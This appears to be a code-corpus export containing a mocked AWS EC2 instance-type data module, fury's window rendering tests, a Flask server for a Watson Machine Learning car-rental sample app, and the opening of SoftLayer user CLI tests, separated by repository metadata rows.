30720}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 
'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 61440, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.8xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 61440}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}] # noqa: E501
def get_instances_list() -> list:
    '''Return the canned EC2 instance-type details for the c4 family.

    The data is the module-level ``get`` list defined above — a mocked
    AWS ``describe_instance_types``-style response covering c4.large
    through c4.8xlarge.
    '''
    # pylint: disable=all
    return get
| 658.583333 | 7,713 | 0.732001 |
79554e661fb8d9852a3e16680f87d885146781a9 | 12,750 | py | Python | fury/tests/test_window.py | hnumair/fury | 6116e1c702c536aae0bb89a2b7e67b4aeef1acad | [
"BSD-3-Clause"
] | 1 | 2021-02-16T22:16:50.000Z | 2021-02-16T22:16:50.000Z | fury/tests/test_window.py | hnumair/fury | 6116e1c702c536aae0bb89a2b7e67b4aeef1acad | [
"BSD-3-Clause"
] | null | null | null | fury/tests/test_window.py | hnumair/fury | 6116e1c702c536aae0bb89a2b7e67b4aeef1acad | [
"BSD-3-Clause"
] | null | null | null | import os
import warnings
from tempfile import TemporaryDirectory as InTemporaryDirectory
import numpy as np
import numpy.testing as npt
import pytest
from fury import actor, window, io
from fury.testing import captured_output, assert_less_equal
from fury.decorators import skip_osx, skip_win
def test_scene():
    """Exercise Scene creation, background colour and actor bookkeeping.

    Renders offscreen snapshots and uses ``analyze_snapshot`` /
    ``analyze_scene`` to verify that ``add``/``rm``/``rm_all`` actually
    change what is rendered, then checks the text printed by
    ``camera_info``.
    """
    scene = window.Scene()
    npt.assert_equal(scene.size(), (0, 0))
    # background color for scene (1, 0.5, 0)
    # 0.001 added here to remove numerical errors when moving from float
    # to int values
    bg_float = (1, 0.501, 0)
    # that will come in the image in the 0-255 uint scale
    bg_color = tuple((np.round(255 * np.array(bg_float))).astype('uint8'))
    scene.background(bg_float)
    # window.show(scene)
    arr = window.snapshot(scene)
    report = window.analyze_snapshot(arr,
                                     bg_color=bg_color,
                                     colors=[bg_color, (0, 127, 0)])
    npt.assert_equal(report.objects, 0)
    npt.assert_equal(report.colors_found, [True, False])
    # An empty scene has no objects; adding/removing the axes actor must
    # flip the object count between 1 and 0.
    axes = actor.axes()
    scene.add(axes)
    # window.show(scene)
    arr = window.snapshot(scene)
    report = window.analyze_snapshot(arr, bg_color)
    npt.assert_equal(report.objects, 1)
    scene.rm(axes)
    arr = window.snapshot(scene)
    report = window.analyze_snapshot(arr, bg_color)
    npt.assert_equal(report.objects, 0)
    scene.add(axes)
    arr = window.snapshot(scene)
    report = window.analyze_snapshot(arr, bg_color)
    npt.assert_equal(report.objects, 1)
    scene.rm_all()
    arr = window.snapshot(scene)
    report = window.analyze_snapshot(arr, bg_color)
    npt.assert_equal(report.objects, 0)
    # A second scene checks actor accounting via analyze_scene instead of
    # pixel analysis.
    ren2 = window.Scene(bg_float)
    ren2.background((0, 0, 0.))
    report = window.analyze_scene(ren2)
    npt.assert_equal(report.bg_color, (0, 0, 0))
    ren2.add(axes)
    report = window.analyze_scene(ren2)
    npt.assert_equal(report.actors, 1)
    ren2.rm(axes)
    report = window.analyze_scene(ren2)
    npt.assert_equal(report.actors, 0)
    with captured_output() as (out, err):
        scene.camera_info()
    npt.assert_equal(out.getvalue().strip(),
                     '# Active Camera\n   '
                     'Position (0.00, 0.00, 1.00)\n   '
                     'Focal Point (0.00, 0.00, 0.00)\n   '
                     'View Up (0.00, 1.00, 0.00)')
    npt.assert_equal(err.getvalue().strip(), '')
def test_deprecated():
    """Check the deprecated window API still works and warns.

    Each legacy entry point (``Renderer``, ``renderer``, ``ren``,
    module-level ``add``/``rm``/``rm_all``/``clear``) must behave like
    the modern Scene API and emit a DeprecationWarning.
    """
    with warnings.catch_warnings(record=True) as w:
        warnings.simplefilter("always", DeprecationWarning)
        scene = window.Renderer()
        npt.assert_equal(scene.size(), (0, 0))
        npt.assert_equal(len(w), 1)
        npt.assert_(issubclass(w[-1].category, DeprecationWarning))
    with warnings.catch_warnings(record=True) as w:
        warnings.simplefilter("always", DeprecationWarning)
        scene = window.renderer(background=(0.0, 1.0, 0.0))
        npt.assert_equal(scene.size(), (0, 0))
        npt.assert_equal(len(w), 1)
        npt.assert_(issubclass(w[-1].category, DeprecationWarning))
    with warnings.catch_warnings(record=True) as w:
        warnings.simplefilter("always", DeprecationWarning)
        scene = window.ren()
        npt.assert_equal(scene.size(), (0, 0))
        # NOTE(review): two warnings expected here — presumably window.ren
        # delegates to another deprecated helper; confirm in fury.window.
        npt.assert_equal(len(w), 2)
        npt.assert_(issubclass(w[-1].category, DeprecationWarning))
    scene = window.Scene()
    with warnings.catch_warnings(record=True) as l_warn:
        warnings.simplefilter("always", DeprecationWarning)
        obj = actor.axes(scale=(1, 1, 1))
        window.add(scene, obj)
        arr = window.snapshot(scene)
        report = window.analyze_snapshot(arr)
        npt.assert_equal(report.objects, 3)
        window.rm(scene, obj)
        arr = window.snapshot(scene)
        report = window.analyze_snapshot(arr)
        npt.assert_equal(report.objects, 0)
        window.add(scene, obj)
        window.rm_all(scene)
        arr = window.snapshot(scene)
        report = window.analyze_snapshot(arr)
        npt.assert_equal(report.objects, 0)
        window.add(scene, obj)
        window.clear(scene)
        report = window.analyze_renderer(scene)
        npt.assert_equal(report.actors, 0)
        # Only count DeprecationWarnings: snapshot/analyze calls may emit
        # unrelated warnings that must not affect the tally.
        deprecated_warns = [w for w in l_warn
                            if issubclass(w.category,
                                          DeprecationWarning)]
        npt.assert_equal(len(deprecated_warns), 7)
        npt.assert_(issubclass(l_warn[-1].category, DeprecationWarning))
def test_active_camera():
    """Exercise the Scene camera helpers against the underlying VTK camera.

    Covers set/get round-trips, zoom (which must not move the camera),
    azimuth/yaw/elevation/pitch/roll rotations checked via snapshots of a
    coloured axes actor, dolly, and finally that ``scene.camera()`` exposes
    the same position/focal point/view-up as ``get_camera``.
    """
    scene = window.Scene()
    scene.add(actor.axes(scale=(1, 1, 1)))
    scene.reset_camera()
    scene.reset_clipping_range()
    direction = scene.camera_direction()
    position, focal_point, view_up = scene.get_camera()
    scene.set_camera((0., 0., 1.), (0., 0., 0), view_up)
    position, focal_point, view_up = scene.get_camera()
    # Looking down +z from (0, 0, 1): direction and position are opposite.
    npt.assert_almost_equal(np.dot(direction, position), -1)
    scene.zoom(1.5)
    # Zooming changes the view angle, not the camera position.
    new_position, _, _ = scene.get_camera()
    npt.assert_array_almost_equal(position, new_position)
    scene.zoom(1)
    # rotate around focal point
    scene.azimuth(90)
    position, _, _ = scene.get_camera()
    npt.assert_almost_equal(position, (1.0, 0.0, 0))
    arr = window.snapshot(scene)
    report = window.analyze_snapshot(arr, colors=[(255, 0, 0)])
    npt.assert_equal(report.colors_found, [True])
    # rotate around camera's center
    scene.yaw(90)
    arr = window.snapshot(scene)
    report = window.analyze_snapshot(arr, colors=[(0, 0, 0)])
    npt.assert_equal(report.colors_found, [True])
    scene.yaw(-90)
    scene.elevation(90)
    arr = window.snapshot(scene)
    report = window.analyze_snapshot(arr, colors=(0, 255, 0))
    npt.assert_equal(report.colors_found, [True])
    scene.set_camera((0., 0., 1.), (0., 0., 0), view_up)
    # vertical rotation of the camera around the focal point
    scene.pitch(10)
    scene.pitch(-10)
    # rotate around the direction of projection
    scene.roll(90)
    # inverted normalized distance from focal point along the direction
    # of the camera
    position, _, _ = scene.get_camera()
    scene.dolly(0.5)
    new_position, focal_point, view_up = scene.get_camera()
    npt.assert_almost_equal(position[2], 0.5 * new_position[2])
    cam = scene.camera()
    # Fixed stray spaces after "npt." that were inconsistent with the rest
    # of the file (previously "npt. assert_equal").
    npt.assert_equal(new_position, cam.GetPosition())
    npt.assert_equal(focal_point, cam.GetFocalPoint())
    npt.assert_equal(view_up, cam.GetViewUp())
def test_parallel_projection():
    """Compare snapshot pixel coverage of perspective vs. parallel projection.

    Two axes actors sit at different depths; under parallel projection the
    far one no longer shrinks, so the scene lights up more pixels than the
    perspective render of the same camera setup.
    """
    scene = window.Scene()
    origin_axes = actor.axes()
    shifted_axes = actor.axes()
    shifted_axes.SetPosition((2, 0, 0))
    scene.add(origin_axes, shifted_axes)
    # Angle the camera so the two actors are at visibly different depths,
    # then zoom in before framing the scene.
    scene.set_camera((1.5, 1.5, 1.5))
    scene.GetActiveCamera().Zoom(2)
    scene.reset_camera()
    persp_frame = window.snapshot(scene)
    scene.projection('parallel')
    parallel_frame = window.snapshot(scene)
    # More non-background pixels under parallel projection, since the far
    # actor renders at full size instead of perspective-shrunk.
    npt.assert_equal((parallel_frame > 0).sum() > (persp_frame > 0).sum(),
                     True)
    # Switching back to perspective must reproduce the original coverage.
    scene.projection('perspective')
    parallel_frame = window.snapshot(scene)
    npt.assert_equal((parallel_frame > 0).sum(), (persp_frame > 0).sum())
@pytest.mark.skipif(skip_osx or skip_win, reason="This test does not work on"
                                                 " Windows and OSX. Need to "
                                                 " be introspected")
def test_order_transparent():
    """Depth-peeling check for snapshot's ``order_transparent`` flag.

    Two semi-transparent tubes (red front, green back) overlap at the
    centre pixel; with order-independent transparency enabled the rear
    green tube must contribute less to that pixel.
    """
    scene = window.Scene()
    lines = [np.array([[1, 0, 1.], [-1, 0, 1.]]),
             np.array([[1, 0, -1.], [-1, 0, -1.]])]
    colors = np.array([[1., 0., 0.], [0., 1., 0.]])
    stream_actor = actor.streamtube(lines, colors, linewidth=0.3, opacity=0.5)
    scene.add(stream_actor)
    scene.reset_camera()
    scene.reset_clipping_range()
    # Green channel of the centre pixel without ordered transparency…
    arr = window.snapshot(scene, fname='green_front.png',
                          offscreen=True, order_transparent=False)
    green_no_ot = arr[150, 150, 1]
    # …and with it.
    arr = window.snapshot(scene, fname='red_front.png',
                          offscreen=True, order_transparent=True)
    # when order transparency is True green should be weaker
    green_ot = arr[150, 150, 1]
    npt.assert_equal(green_no_ot > green_ot, True)
@pytest.mark.skipif(skip_win, reason="This test does not work on Windows."
                                     " Need to be introspected")
def test_stereo():
    """Check snapshot's stereo rendering mode.

    A mono render has content at the frame centre; a horizontal-split
    stereo render of the same scene leaves the centre empty. Requesting
    stereo is also expected to raise a UserWarning.
    """
    scene = window.Scene()
    lines = [np.array([[-1, 0, 0.], [1, 0, 0.]]),
             np.array([[-1, 1, 0.], [1, 1, 0.]])]
    colors = np.array([[1., 0., 0.], [0., 1., 0.]])
    stream_actor = actor.streamtube(lines, colors, linewidth=0.3, opacity=0.5)
    scene.add(stream_actor)
    # green in front
    scene.elevation(90)
    scene.camera().OrthogonalizeViewUp()
    scene.reset_clipping_range()
    scene.reset_camera()
    mono = window.snapshot(scene, fname='stereo_off.png', offscreen=True,
                           size=(300, 300), order_transparent=True,
                           stereo='off')
    with npt.assert_warns(UserWarning):
        stereo = window.snapshot(scene, fname='stereo_horizontal.png',
                                 offscreen=True, size=(300, 300),
                                 order_transparent=True, stereo='On')
    # mono render should have values in the center
    # horizontal split stereo render should be empty in the center
    npt.assert_raises(AssertionError, npt.assert_array_equal,
                      mono[150, 150], [0, 0, 0])
    npt.assert_array_equal(stereo[150, 150], [0, 0, 0])
def test_record():
    """End-to-end checks of ``window.record``.

    Covers: the default output file, ``out_path``/``path_numbering``/
    ``n_frames`` file naming, the ``verbose`` camera printout, explicit
    camera options, and ``size``/``magnification``/``screen_clip``
    behaviour (the last part is skipped on OSX).
    """
    xyzr = np.array([[0, 0, 0, 10], [100, 0, 0, 25], [200, 0, 0, 50]])
    colors = np.array([[1, 0, 0, 1], [0, 1, 0, 1], [0, 0, 1., 1]])
    sphere_actor = actor.sphere(centers=xyzr[:, :3], colors=colors[:],
                                radii=xyzr[:, 3])
    scene = window.Scene()
    scene.add(sphere_actor)
    # Helper: assert the recorded image exists and shows the three spheres
    # with the expected colours.
    def test_content(filename='fury.png', colors_found=(True, True)):
        npt.assert_equal(os.path.isfile(filename), True)
        arr = io.load_image(filename)
        report = window.analyze_snapshot(arr, colors=[(0, 255, 0),
                                                      (255, 0, 0)])
        npt.assert_equal(report.objects, 3)
        npt.assert_equal(report.colors_found, colors_found)
        return arr
    # Basic test
    with InTemporaryDirectory():
        window.record(scene)
        test_content()
    # test out_path and path_numbering, n_frame
    with InTemporaryDirectory():
        filename = "tmp_snapshot.png"
        window.record(scene, out_path=filename)
        test_content(filename)
        window.record(scene, out_path=filename, path_numbering=True)
        test_content(filename + "000000.png")
        window.record(scene, out_path=filename, path_numbering=True,
                      n_frames=3)
        test_content(filename + "000000.png")
        test_content(filename + "000001.png")
        test_content(filename + "000002.png")
        npt.assert_equal(os.path.isfile(filename + "000003.png"), False)
    # test verbose
    with captured_output() as (out, _):
        window.record(scene, verbose=True)
    npt.assert_equal(out.getvalue().strip(),
                     "Camera Position (315.14, 0.00, 536.43)\n"
                     "Camera Focal Point (119.89, 0.00, 0.00)\n"
                     "Camera View Up (0.00, 1.00, 0.00)")
    # test camera option
    with InTemporaryDirectory():
        window.record(scene, cam_pos=(310, 0, 530), cam_focal=(120, 0, 0),
                      cam_view=(0, 0, 1))
        test_content()
    # test size and clipping
    # Skip it on Mac mainly due to offscreen case on Travis. It works well
    # with a display. Need to check if screen_clip works. Need to check if
    # ReadFrontBufferOff(), ShouldRerenderOn() could improved this OSX case.
    if not skip_osx:
        with InTemporaryDirectory():
            window.record(scene, out_path='fury_1.png', size=(1000, 1000),
                          magnification=5)
            npt.assert_equal(os.path.isfile('fury_1.png'), True)
            arr = io.load_image('fury_1.png')
            npt.assert_equal(arr.shape, (5000, 5000, 3))
            window.record(scene, out_path='fury_2.png', size=(5000, 5000),
                          screen_clip=True)
            npt.assert_equal(os.path.isfile('fury_2.png'), True)
            arr = io.load_image('fury_2.png')
            assert_less_equal(arr.shape[0], 5000)
            assert_less_equal(arr.shape[1], 5000)
| 34.182306 | 78 | 0.618824 |
79554fb2b2825f2322030678e1bfd41d2715c71e | 2,643 | py | Python | cloud/applications/cars-4-you/server.py | LaudateCorpus1/watson-machine-learning-samples | 2eef2d00844db9bee7c20d74503e172e5683a313 | [
"Apache-2.0"
] | 27 | 2020-09-09T20:46:03.000Z | 2021-11-29T20:13:35.000Z | cloud/applications/cars-4-you/server.py | LaudateCorpus1/watson-machine-learning-samples | 2eef2d00844db9bee7c20d74503e172e5683a313 | [
"Apache-2.0"
] | 6 | 2020-09-21T12:50:05.000Z | 2021-01-09T14:06:41.000Z | cloud/applications/cars-4-you/server.py | LaudateCorpus1/watson-machine-learning-samples | 2eef2d00844db9bee7c20d74503e172e5683a313 | [
"Apache-2.0"
] | 55 | 2020-09-14T12:38:44.000Z | 2022-03-18T13:28:34.000Z | import os
from flask import Flask, send_from_directory, request, jsonify, logging
from wml_utils import WMLHelper
from nlu_utils import NLUUtils
from get_details import get_wml_details, get_cos_details, get_details
# Flask app serving the static SPA plus the scoring endpoints below.
app = Flask(__name__, static_url_path='/static')
# Watson Machine Learning connection details — presumably credentials/URL
# from the environment or config; see the get_details module to confirm.
wml_details = get_wml_details()
# Shared WML client wrapper used by every scoring endpoint in this module.
wml_client = WMLHelper(wml_details)
@app.route('/')
def root():
    # Serve the single-page app entry point from the static folder.
    return app.send_static_file('index.html')
@app.route('/stylesheets/<path:path>')
def send_styles(path):
    # Serve CSS assets from static/stylesheets.
    return send_from_directory('static/stylesheets', path)
@app.route('/scripts/<path:path>')
def send_js(path):
    # Serve JavaScript assets from static/scripts.
    return send_from_directory('static/scripts', path)
@app.route('/staticImages/<path:path>')
def send_img(path):
    # Serve image assets from static/images.
    return send_from_directory('static/images', path)
@app.route('/analyze/area', methods=['POST'])
def anayze_area():
    """POST endpoint: score a ticket's business area via the WML client.

    NOTE(review): the function name has a typo ("anayze"); it is kept
    because Flask derives the endpoint id (used by ``url_for``) from it.
    """
    request_json = request.get_json(force=True)
    app.logger.debug("Area request: {}".format(request_json))
    try:
        scoring_result = wml_client.analyze_business_area(request_json)
        return jsonify(scoring_result), 200
    except Exception as err:
        # Boundary handler: report the failure as a plain-text 500.
        return str(err), 500
@app.route('/analyze/satisfaction', methods=['POST'])
def analyze_satisfaction():
    """POST endpoint: predict customer satisfaction for a raw text body."""
    text = request.get_data().decode('utf-8')
    app.logger.debug("Comment to analyze: {}".format(text))
    try:
        prediction = wml_client.analyze_satisfaction(text)
        app.logger.debug("Predicted satisfaction: {}".format(prediction))
        return prediction
    except Exception as err:
        # Boundary handler: report the failure as a plain-text 500.
        return str(err), 500
@app.route('/functions/satisfaction', methods=['GET'])
def functions_satisfaction():
    """GET endpoint: list deployed WML functions for satisfaction scoring."""
    deployments = wml_client.get_function_deployments(keyword="satisfaction")
    app.logger.debug("Satisfaction functions: {}".format(deployments))
    return jsonify({"deployments": deployments})
@app.route('/functions/area', methods=['GET'])
def functions_area():
    """GET endpoint: list deployed WML functions for business-area scoring."""
    deployments = wml_client.get_function_deployments(keyword="area")
    app.logger.debug("Area functions: {}".format(deployments))
    return jsonify({"deployments": deployments})
@app.route('/functions', methods=['POST'])
def functions():
    """POST endpoint: update the scoring deployments used by the app.

    Expects a JSON body describing the chosen deployments and forwards it
    to ``WMLHelper.update_scoring_functions``. Returns "ok" on success or
    the error text with HTTP 500 on failure.
    """
    models = request.get_json(force=True)
    # Fixed typo in the log message ("anayze" -> "analyze") and merged the
    # two consecutive info() calls into one lazily-formatted record.
    app.logger.info("Request to analyze: %s", models)
    try:
        wml_client.update_scoring_functions(deployments=models)
        return jsonify("ok"), 200
    except Exception as e:
        # Log at error level (was info) so failures stand out in the logs.
        app.logger.error(str(e))
        return jsonify(str(e)), 500
# PORT is supplied by the hosting platform when deployed; fall back to
# 5000 for local development.
port = os.getenv('PORT', '5000')
if __name__ == "__main__":
    app.run(host='0.0.0.0', port=int(port))
| 28.728261 | 82 | 0.701854 |
79554fc85ca958660bbd860f5d711cb9eea35128 | 12,510 | py | Python | tests/CLI/modules/user_tests.py | acamacho82/softlayer-python | 8a755be00dcb86abc20fcc4b4f69e3155ba187e8 | [
"MIT"
] | 2 | 2016-07-06T15:31:48.000Z | 2016-07-06T15:40:25.000Z | tests/CLI/modules/user_tests.py | acamacho82/softlayer-python | 8a755be00dcb86abc20fcc4b4f69e3155ba187e8 | [
"MIT"
] | 73 | 2016-07-05T15:17:51.000Z | 2016-08-18T18:16:29.000Z | tests/CLI/modules/user_tests.py | kyubifire/softlayer-python | bee36eec73474a8b6a1813fbbcc0512f81bf1779 | [
"MIT"
] | 1 | 2019-07-22T05:20:39.000Z | 2019-07-22T05:20:39.000Z | """
SoftLayer.tests.CLI.modules.user_tests
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests for the user cli command
"""
import json
import sys
import mock
import testtools
from SoftLayer import testing
class UserCLITests(testing.TestCase):
"""User list tests"""
def test_user_list(self):
result = self.run_command(['user', 'list'])
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_Account', 'getUsers')
def test_user_list_only_id(self):
result = self.run_command(['user', 'list', '--columns=id'])
self.assert_no_fail(result)
self.assertEqual([{"id": 11100}, {"id": 11111}], json.loads(result.output))
"""User detail tests"""
def test_detail(self):
result = self.run_command(['user', 'detail', '11100'])
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer', 'getObject')
def test_detail_keys(self):
result = self.run_command(['user', 'detail', '11100', '-k'])
self.assert_no_fail(result)
self.assertIn('APIKEY', result.output)
def test_detail_permissions(self):
result = self.run_command(['user', 'detail', '11100', '-p'])
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer', 'getPermissions')
self.assertIn('ACCESS_ALL_HARDWARE', result.output)
def test_detail_hardware(self):
result = self.run_command(['user', 'detail', '11100', '-h'])
self.assert_no_fail(result)
self.assert_called_with(
'SoftLayer_User_Customer', 'getObject', identifier=11100,
mask='mask[id, hardware, dedicatedHosts]'
)
def test_detail_virtual(self):
result = self.run_command(['user', 'detail', '11100', '-v'])
self.assert_no_fail(result)
self.assert_called_with(
'SoftLayer_User_Customer', 'getObject', identifier=11100,
mask='mask[id, virtualGuests]'
)
def test_detail_logins(self):
result = self.run_command(['user', 'detail', '11100', '-l'])
self.assert_no_fail(result)
self.assert_called_with(
'SoftLayer_User_Customer', 'getLoginAttempts', identifier=11100
)
def test_detail_events(self):
result = self.run_command(['user', 'detail', '11100', '-e'])
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_Event_Log', 'getAllObjects')
def test_print_hardware_access(self):
mock = self.set_mock('SoftLayer_User_Customer', 'getObject')
mock.return_value = {
'accountId': 12345,
'address1': '315 Test Street',
'city': 'Houston',
'companyName': 'SoftLayer Development Community',
'country': 'US',
'displayName': 'Test',
'email': 'test@us.ibm.com',
'firstName': 'Test',
'id': 244956,
'lastName': 'Testerson',
'postalCode': '77002',
'state': 'TX',
'statusDate': None,
'hardware': [
{'id': 1234,
'fullyQualifiedDomainName': 'test.test.test',
'provisionDate': '2018-05-08T15:28:32-06:00',
'primaryBackendIpAddress': '175.125.126.118',
'primaryIpAddress': '175.125.126.118'}
],
'dedicatedHosts': [
{'id': 1234,
'fullyQualifiedDomainName': 'test.test.test',
'provisionDate': '2018-05-08T15:28:32-06:00',
'primaryBackendIpAddress': '175.125.126.118',
'primaryIpAddress': '175.125.126.118'}
],
}
result = self.run_command(['user', 'detail', '11100', '-h'])
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer', 'getObject', identifier=11100,
mask="mask[id, hardware, dedicatedHosts]")
"""User permissions tests"""
def test_permissions_list(self):
result = self.run_command(['user', 'permissions', '11100'])
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer_CustomerPermission_Permission', 'getAllObjects')
self.assert_called_with(
'SoftLayer_User_Customer', 'getObject', identifier=11100,
mask='mask[id, permissions, isMasterUserFlag, roles]'
)
"""User edit-permissions tests"""
def test_edit_perms_on(self):
result = self.run_command(['user', 'edit-permissions', '11100', '--enable', '-p', 'TEST'])
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer', 'addBulkPortalPermission', identifier=11100)
def test_edit_perms_on_bad(self):
result = self.run_command(['user', 'edit-permissions', '11100', '--enable', '-p', 'TEST_NOt_exist'])
self.assertEqual(result.exit_code, 1)
def test_edit_perms_off(self):
result = self.run_command(['user', 'edit-permissions', '11100', '--disable', '-p', 'TEST'])
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer', 'removeBulkPortalPermission', identifier=11100)
@mock.patch('SoftLayer.CLI.user.edit_permissions.click')
def test_edit_perms_off_failure(self, click):
permission_mock = self.set_mock('SoftLayer_User_Customer', 'removeBulkPortalPermission')
permission_mock.return_value = False
result = self.run_command(['user', 'edit-permissions', '11100', '--disable', '-p', 'TEST'])
click.secho.assert_called_with('Failed to update permissions: TEST', fg='red')
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer', 'removeBulkPortalPermission', identifier=11100)
def test_edit_perms_from_user(self):
result = self.run_command(['user', 'edit-permissions', '11100', '-u', '1234'])
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer', 'getPermissions', identifier=1234)
self.assert_called_with('SoftLayer_User_Customer', 'removeBulkPortalPermission', identifier=11100)
self.assert_called_with('SoftLayer_User_Customer', 'addBulkPortalPermission', identifier=11100)
"""User create tests"""
@mock.patch('SoftLayer.CLI.formatting.confirm')
def test_create_user(self, confirm_mock):
confirm_mock.return_value = True
result = self.run_command(['user', 'create', 'test', '-e', 'test@us.ibm.com', '-p', 'testword'])
self.assert_no_fail(result)
self.assertIn('test@us.ibm.com', result.output)
self.assert_called_with('SoftLayer_Account', 'getCurrentUser')
self.assert_called_with('SoftLayer_User_Customer', 'createObject', args=mock.ANY)
@mock.patch('SoftLayer.CLI.formatting.confirm')
def test_create_user_no_confirm(self, confirm_mock):
confirm_mock.return_value = False
result = self.run_command(['user', 'create', 'test', '-e', 'test@us.ibm.com', '-p', 'testword'])
self.assertEqual(result.exit_code, 2)
@testtools.skipIf(sys.version_info < (3, 6), "Secrets module only exists in version 3.6+")
@mock.patch('secrets.choice')
@mock.patch('SoftLayer.CLI.formatting.confirm')
def test_create_user_generate_password_36(self, confirm_mock, secrets):
secrets.return_value = 'Q'
confirm_mock.return_value = True
result = self.run_command(['user', 'create', 'test', '-e', 'test@us.ibm.com', '-p', 'generate'])
self.assert_no_fail(result)
self.assertIn('test@us.ibm.com', result.output)
self.assertIn('QQQQQQQQQQQQQQQQQQQQQQ', result.output)
self.assert_called_with('SoftLayer_Account', 'getCurrentUser')
self.assert_called_with('SoftLayer_User_Customer', 'createObject', args=mock.ANY)
@mock.patch('SoftLayer.CLI.formatting.confirm')
def test_create_user_generate_password_2(self, confirm_mock):
if sys.version_info >= (3, 6):
self.skipTest("Python needs to be < 3.6 for this test.")
confirm_mock.return_value = True
result = self.run_command(['user', 'create', 'test', '-e', 'test@us.ibm.com', '-p', 'generate'])
self.assertIn(result.output, "ImportError")
@mock.patch('SoftLayer.CLI.formatting.confirm')
def test_create_user_and_apikey(self, confirm_mock):
confirm_mock.return_value = True
result = self.run_command(['user', 'create', 'test', '-e', 'test@us.ibm.com', '-a'])
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer', 'addApiAuthenticationKey')
@mock.patch('SoftLayer.CLI.formatting.confirm')
def test_create_user_with_template(self, confirm_mock):
confirm_mock.return_value = True
result = self.run_command(['user', 'create', 'test', '-e', 'test@us.ibm.com',
'-t', '{"firstName": "Supermand"}'])
self.assertIn('Supermand', result.output)
@mock.patch('SoftLayer.CLI.formatting.confirm')
def test_create_user_with_bad_template(self, confirm_mock):
confirm_mock.return_value = True
result = self.run_command(['user', 'create', 'test', '-e', 'test@us.ibm.com',
'-t', '{firstName: "Supermand"}'])
self.assertIn("Argument Error", result.exception.message)
self.assertEqual(result.exit_code, 2)
@mock.patch('SoftLayer.CLI.formatting.confirm')
def test_create_user_with_no_confirm(self, confirm_mock):
confirm_mock.return_value = False
result = self.run_command(['user', 'create', 'test', '-e', 'test@us.ibm.com'])
self.assertIn("Canceling creation!", result.exception.message)
self.assertEqual(result.exit_code, 2)
@mock.patch('SoftLayer.CLI.formatting.confirm')
def test_create_user_from_user(self, confirm_mock):
confirm_mock.return_value = True
result = self.run_command(['user', 'create', 'test', '-e', 'test@us.ibm.com', '-u', '1234'])
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer', 'getObject', identifier=1234)
"""User edit-details tests"""
@mock.patch('SoftLayer.CLI.user.edit_details.click')
def test_edit_details(self, click):
result = self.run_command(['user', 'edit-details', '1234', '-t', '{"firstName":"Supermand"}'])
click.secho.assert_called_with('1234 updated successfully', fg='green')
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer', 'editObject',
args=({'firstName': 'Supermand'},), identifier=1234)
@mock.patch('SoftLayer.CLI.user.edit_details.click')
def test_edit_details_failure(self, click):
mock = self.set_mock('SoftLayer_User_Customer', 'editObject')
mock.return_value = False
result = self.run_command(['user', 'edit-details', '1234', '-t', '{"firstName":"Supermand"}'])
click.secho.assert_called_with('Failed to update 1234', fg='red')
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer', 'editObject',
args=({'firstName': 'Supermand'},), identifier=1234)
def test_edit_details_bad_json(self):
result = self.run_command(['user', 'edit-details', '1234', '-t', '{firstName:"Supermand"}'])
self.assertIn("Argument Error", result.exception.message)
self.assertEqual(result.exit_code, 2)
"""User delete tests"""
@mock.patch('SoftLayer.CLI.user.delete.click')
def test_delete(self, click):
result = self.run_command(['user', 'delete', '12345'])
click.secho.assert_called_with('12345 deleted successfully', fg='green')
self.assert_no_fail(result)
self.assert_called_with('SoftLayer_User_Customer', 'editObject',
